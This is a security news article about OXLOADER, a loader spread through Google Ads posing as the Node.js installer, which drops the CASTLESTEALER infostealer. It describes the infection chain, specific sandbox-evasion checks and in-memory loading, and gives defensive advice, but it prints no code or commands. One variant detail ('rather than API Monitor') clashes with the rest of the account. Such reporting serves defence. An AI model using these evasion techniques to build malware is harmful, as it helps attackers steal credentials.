OXLOADER Malware Delivered via Google Ads Impersonating Node.js Installer
Elastic Security Labs has uncovered OXLOADER, a novel loader distributed through Google Ads that impersonates the Node.js installer to deploy the CASTLESTEALER infostealer on Windows systems.
Elastic Security Labs has identified a new malware loader, tracked as OXLOADER, that is being distributed through malicious Google Ads impersonating the Node.js installer. The campaign, which targets Windows users in the United States, delivers the CASTLESTEALER infostealer after a single click on a sponsored search result. The attack exploits the common practice of trusting top search results when downloading software, using a fake landing page that closely mimics the official Node.js platform.
The infection chain begins when a user searches for the Node.js installer and clicks a sponsored ad. The victim is redirected through an intermediary domain to a malicious Windows batch script hosted on Storj, a legitimate cloud storage service. This abuse of a trusted service helps the attack bypass reputation-based filtering. The batch script then displays a convincing fake software installation wizard while silently downloading the next-stage executable using PowerShell and triggering a Windows User Account Control prompt to gain elevated system access.
OXLOADER is built with extensive evasion capabilities. Before executing its payload, it performs five separate checks to confirm it is not running inside a sandbox or virtual machine. These checks include verifying at least three CPU cores, at least 3 GB of physical RAM, a display refresh rate above 20 Hz, and ensuring the system is not located in a CIS region or configured for the Russian language. The loader also uses sophisticated obfuscation techniques, hiding malicious code inside the Windows .reloc section and unpacking itself in memory using self-modifying decryption routines.
The final payload, CASTLESTEALER, is a .NET-based infostealer delivered entirely in memory using the open-source shellcode generator DonutLoader, leaving almost no trace on disk. The malware is capable of harvesting sensitive data from infected systems, including credentials, browser data, and other valuable information. Elastic Security Labs confirmed the campaign was actively targeting one of their own customers.
The malicious advertiser account was registered under a verified name linked to Ukraine. The last appearance of the ad was on April 23, 2026, and by May 14, 2026, Google had removed the advertiser and all associated campaigns. A second variant of OXLOADER was discovered on May 13, 2026, masquerading as a Node.js installer binary rather than API Monitor, with the same underlying loader mechanism.
Security teams are advised to treat sponsored search results for developer tools with extra scrutiny, ensure endpoint behavioral detection is active rather than just set to monitor mode, and always verify software downloads directly against official vendor websites. The campaign highlights the ongoing threat of malvertising and the need for vigilance when downloading software from search engine results.